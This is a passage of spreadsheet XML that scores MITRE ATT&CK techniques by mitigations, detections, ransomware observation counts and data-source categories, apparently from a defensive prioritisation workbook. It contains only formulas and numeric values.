      <c r="AP367" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ367" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>156.8316999047619</v>
      </c>
      <c r="AR367" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS367" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT367" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU36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68" spans="1:47" ht="51">
      <c r="A368" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B368" s="37">
        <f t="shared" si="5"/>
        <v>263.64782719047622</v>
      </c>
      <c r="C368" s="37" t="s">
        <v>1289</v>
      </c>
      <c r="D368" s="50" t="s">
        <v>1272</v>
      </c>
      <c r="E368" s="37" t="s">
        <v>1290</v>
      </c>
      <c r="F368" s="37">
        <v>1</v>
      </c>
      <c r="G368" s="37">
        <v>1</v>
      </c>
      <c r="H368" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I368" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J368" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K368" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L368" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M368" s="37">
        <v>0</v>
      </c>
      <c r="N368" s="56">
        <v>0</v>
      </c>
      <c r="O368" s="56">
        <v>1</v>
      </c>
      <c r="P368" s="56">
        <v>1</v>
      </c>
      <c r="Q368" s="56">
        <v>1</v>
      </c>
      <c r="R368" s="57" t="s">
        <v>1279</v>
      </c>
      <c r="S368" s="57">
        <v>2</v>
      </c>
      <c r="T368" s="57" t="s">
        <v>1280</v>
      </c>
      <c r="U368" s="57">
        <v>5</v>
      </c>
      <c r="V368" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>8.0952523809523808E-2</v>
      </c>
      <c r="W368" s="37">
        <v>7</v>
      </c>
      <c r="X368" s="37">
        <v>0.127273</v>
      </c>
      <c r="Y368" s="37">
        <v>0.127273</v>
      </c>
      <c r="Z368" s="37">
        <v>3</v>
      </c>
      <c r="AA368" s="37">
        <v>0.03</v>
      </c>
      <c r="AB368" s="37">
        <v>0.03</v>
      </c>
      <c r="AC368" s="37"/>
      <c r="AD368" s="50" t="s">
        <v>1281</v>
      </c>
      <c r="AE368" s="37" t="str" cm="1">
        <f t="array" ref="AE368">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD368)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF368" s="37">
        <v>364</v>
      </c>
      <c r="AG368" s="37" t="str" cm="1">
        <f t="array" ref="AG368">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD368)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH368" s="37">
        <v>364</v>
      </c>
      <c r="AI368" s="37" t="str" cm="1">
        <f t="array" ref="AI368">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD368)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ368" s="37">
        <v>364</v>
      </c>
      <c r="AK368" s="37" t="str" cm="1">
        <f t="array" ref="AK368">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD368)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL368" s="37">
        <v>364</v>
      </c>
      <c r="AM368" s="37" t="str" cm="1">
        <f t="array" ref="AM368">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD368)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN368" s="37">
        <v>0</v>
      </c>
      <c r="AO368" s="37">
        <v>0</v>
      </c>
      <c r="AP368" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ368" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>87.882609063492069</v>
      </c>
      <c r="AR368" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS368" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT368" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU36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69" spans="1:47" ht="51">
      <c r="A369" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B369" s="37">
        <f t="shared" si="5"/>
        <v>647.01414657142845</v>
      </c>
      <c r="C369" s="37" t="s">
        <v>1291</v>
      </c>
      <c r="D369" s="50" t="s">
        <v>1272</v>
      </c>
      <c r="E369" s="37" t="s">
        <v>1292</v>
      </c>
      <c r="F369" s="37">
        <v>1</v>
      </c>
      <c r="G369" s="37">
        <v>1</v>
      </c>
      <c r="H369" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I369" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J369" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K369" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L369" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M369" s="37">
        <v>0</v>
      </c>
      <c r="N369" s="56">
        <v>0</v>
      </c>
      <c r="O369" s="56">
        <v>1</v>
      </c>
      <c r="P369" s="56">
        <v>4</v>
      </c>
      <c r="Q369" s="56">
        <v>3</v>
      </c>
      <c r="R369" s="57" t="s">
        <v>1293</v>
      </c>
      <c r="S369" s="57">
        <v>14</v>
      </c>
      <c r="T369" s="57" t="s">
        <v>1294</v>
      </c>
      <c r="U369" s="57">
        <v>18</v>
      </c>
      <c r="V369" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.34285704761904756</v>
      </c>
      <c r="W369" s="37">
        <v>32</v>
      </c>
      <c r="X369" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Y369" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Z369" s="37">
        <v>8</v>
      </c>
      <c r="AA369" s="37">
        <v>0.08</v>
      </c>
      <c r="AB369" s="37">
        <v>0.08</v>
      </c>
      <c r="AC369" s="37"/>
      <c r="AD369" s="50" t="s">
        <v>1295</v>
      </c>
      <c r="AE369" s="37" t="str" cm="1">
        <f t="array" ref="AE369">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD369)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF369" s="37">
        <v>365</v>
      </c>
      <c r="AG369" s="37" t="str" cm="1">
        <f t="array" ref="AG369">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD369)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH369" s="37">
        <v>365</v>
      </c>
      <c r="AI369" s="37" t="str" cm="1">
        <f t="array" ref="AI369">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD369)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ369" s="37">
        <v>365</v>
      </c>
      <c r="AK369" s="37" t="str" cm="1">
        <f t="array" ref="AK369">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD369)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL369" s="37">
        <v>365</v>
      </c>
      <c r="AM369" s="37" t="str" cm="1">
        <f t="array" ref="AM369">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD369)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN369" s="37">
        <v>0</v>
      </c>
      <c r="AO369" s="37">
        <v>1</v>
      </c>
      <c r="AP369" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ369" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>215.67138219047615</v>
      </c>
      <c r="AR369" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS369" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT369" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU36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5.1588424331065745</v>
      </c>
    </row>
    <row r="370" spans="1:47" ht="34">
      <c r="A370" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B370" s="37">
        <f t="shared" si="5"/>
        <v>411.59558690476189</v>
      </c>
      <c r="C370" s="37" t="s">
        <v>1296</v>
      </c>
      <c r="D370" s="50" t="s">
        <v>1272</v>
      </c>
      <c r="E370" s="37" t="s">
        <v>1297</v>
      </c>
      <c r="F370" s="37">
        <v>1</v>
      </c>
      <c r="G370" s="37">
        <v>1</v>
      </c>
      <c r="H370" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I370" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J370" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K370" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L370" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M370" s="37">
        <v>0</v>
      </c>
      <c r="N370" s="56">
        <v>0</v>
      </c>
      <c r="O370" s="56">
        <v>0</v>
      </c>
      <c r="P370" s="56">
        <v>0</v>
      </c>
      <c r="Q370" s="56">
        <v>0</v>
      </c>
      <c r="R370" s="57" t="s">
        <v>1298</v>
      </c>
      <c r="S370" s="57">
        <v>8</v>
      </c>
      <c r="T370" s="57" t="s">
        <v>1299</v>
      </c>
      <c r="U370" s="57">
        <v>11</v>
      </c>
      <c r="V370" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.18095261904761906</v>
      </c>
      <c r="W370" s="37">
        <v>19</v>
      </c>
      <c r="X370" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Y370" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Z370" s="37">
        <v>0</v>
      </c>
      <c r="AA370" s="37">
        <v>0</v>
      </c>
      <c r="AB370" s="37">
        <v>0</v>
      </c>
      <c r="AC370" s="37"/>
      <c r="AD370" s="50" t="s">
        <v>1300</v>
      </c>
      <c r="AE370" s="37" t="str" cm="1">
        <f t="array" ref="AE370">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD370)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF370" s="37">
        <v>366</v>
      </c>
      <c r="AG370" s="37" t="str" cm="1">
        <f t="array" ref="AG370">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD370)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH370" s="37">
        <v>366</v>
      </c>
      <c r="AI370" s="37" t="str" cm="1">
        <f t="array" ref="AI370">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD370)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ370" s="37">
        <v>366</v>
      </c>
      <c r="AK370" s="37" t="str" cm="1">
        <f t="array" ref="AK370">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD370)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL370" s="37">
        <v>366</v>
      </c>
      <c r="AM370" s="37" t="str" cm="1">
        <f t="array" ref="AM370">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD370)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN370" s="37">
        <v>0</v>
      </c>
      <c r="AO370" s="37">
        <v>0</v>
      </c>
      <c r="AP370" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ370" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>137.19852896825395</v>
      </c>
      <c r="AR370" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS370" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT370" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU37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71" spans="1:47" ht="34">
      <c r="A371" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B371" s="37">
        <f t="shared" si="5"/>
        <v>286.80448209523814</v>
      </c>
      <c r="C371" s="37" t="s">
        <v>1301</v>
      </c>
      <c r="D371" s="50" t="s">
        <v>1272</v>
      </c>
      <c r="E371" s="37" t="s">
        <v>1302</v>
      </c>
      <c r="F371" s="37">
        <v>1</v>
      </c>
      <c r="G371" s="37">
        <v>1</v>
      </c>
      <c r="H371" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I371" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J371" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K371" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L371" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M371" s="37">
        <v>0</v>
      </c>
      <c r="N371" s="56">
        <v>0</v>
      </c>
      <c r="O371" s="56">
        <v>1</v>
      </c>
      <c r="P371" s="56">
        <v>0</v>
      </c>
      <c r="Q371" s="56">
        <v>1</v>
      </c>
      <c r="R371" s="57" t="s">
        <v>1279</v>
      </c>
      <c r="S371" s="57">
        <v>2</v>
      </c>
      <c r="T371" s="57" t="s">
        <v>1303</v>
      </c>
      <c r="U371" s="57">
        <v>7</v>
      </c>
      <c r="V371" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.523790476190476E-2</v>
      </c>
      <c r="W371" s="37">
        <v>9</v>
      </c>
      <c r="X371" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y371" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z371" s="37">
        <v>2</v>
      </c>
      <c r="AA371" s="37">
        <v>0.02</v>
      </c>
      <c r="AB371" s="37">
        <v>0.02</v>
      </c>
      <c r="AC371" s="37"/>
      <c r="AD371" s="50" t="s">
        <v>1304</v>
      </c>
      <c r="AE371" s="37" t="str" cm="1">
        <f t="array" ref="AE371">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD371)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF371" s="37">
        <v>367</v>
      </c>
      <c r="AG371" s="37" t="str" cm="1">
        <f t="array" ref="AG371">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD371)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH371" s="37">
        <v>367</v>
      </c>
      <c r="AI371" s="37" t="str" cm="1">
        <f t="array" ref="AI371">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD371)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ371" s="37">
        <v>367</v>
      </c>
      <c r="AK371" s="37" t="str" cm="1">
        <f t="array" ref="AK371">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD371)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL371" s="37">
        <v>367</v>
      </c>
      <c r="AM371" s="37" t="str" cm="1">
        <f t="array" ref="AM371">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD371)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN371" s="37">
        <v>0</v>
      </c>
      <c r="AO371" s="37">
        <v>1</v>
      </c>
      <c r="AP371" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ371" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>95.601494031746043</v>
      </c>
      <c r="AR371" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS371" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT371" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU37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2.3000355721844294</v>
      </c>
    </row>
    <row r="372" spans="1:47" ht="34">
      <c r="A372" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B372" s="37">
        <f t="shared" si="5"/>
        <v>385.78550385714288</v>
      </c>
      <c r="C372" s="37" t="s">
        <v>1305</v>
      </c>
      <c r="D372" s="50" t="s">
        <v>1272</v>
      </c>
      <c r="E372" s="37" t="s">
        <v>1306</v>
      </c>
      <c r="F372" s="37">
        <v>1</v>
      </c>
      <c r="G372" s="37">
        <v>1</v>
      </c>
      <c r="H372" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I372" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J372" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K372" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L372" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M372" s="37">
        <v>0</v>
      </c>
      <c r="N372" s="56">
        <v>0</v>
      </c>
      <c r="O372" s="56">
        <v>4</v>
      </c>
      <c r="P372" s="56">
        <v>0</v>
      </c>
      <c r="Q372" s="56">
        <v>0</v>
      </c>
      <c r="R372" s="57" t="s">
        <v>757</v>
      </c>
      <c r="S372" s="57">
        <v>7</v>
      </c>
      <c r="T372" s="57" t="s">
        <v>1307</v>
      </c>
      <c r="U372" s="57">
        <v>8</v>
      </c>
      <c r="V372" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.16190461904761905</v>
      </c>
      <c r="W372" s="37">
        <v>15</v>
      </c>
      <c r="X372" s="37">
        <v>0.272727</v>
      </c>
      <c r="Y372" s="37">
        <v>0.272727</v>
      </c>
      <c r="Z372" s="37">
        <v>4</v>
      </c>
      <c r="AA372" s="37">
        <v>0.04</v>
      </c>
      <c r="AB372" s="37">
        <v>0.04</v>
      </c>
      <c r="AC372" s="37"/>
      <c r="AD372" s="50" t="s">
        <v>1308</v>
      </c>
      <c r="AE372" s="37" t="str" cm="1">
        <f t="array" ref="AE372">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD372)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF372" s="37">
        <v>368</v>
      </c>
      <c r="AG372" s="37" t="str" cm="1">
        <f t="array" ref="AG372">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD372)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH372" s="37">
        <v>368</v>
      </c>
      <c r="AI372" s="37" t="str" cm="1">
        <f t="array" ref="AI372">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD372)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ372" s="37">
        <v>368</v>
      </c>
      <c r="AK372" s="37" t="str" cm="1">
        <f t="array" ref="AK372">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD372)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL372" s="37">
        <v>368</v>
      </c>
      <c r="AM372" s="37" t="str" cm="1">
        <f t="array" ref="AM372">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD372)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN372" s="37">
        <v>0</v>
      </c>
      <c r="AO372" s="37">
        <v>0</v>
      </c>
      <c r="AP372" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ372" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>128.59516795238096</v>
      </c>
      <c r="AR372" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS372" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT372" s="37">
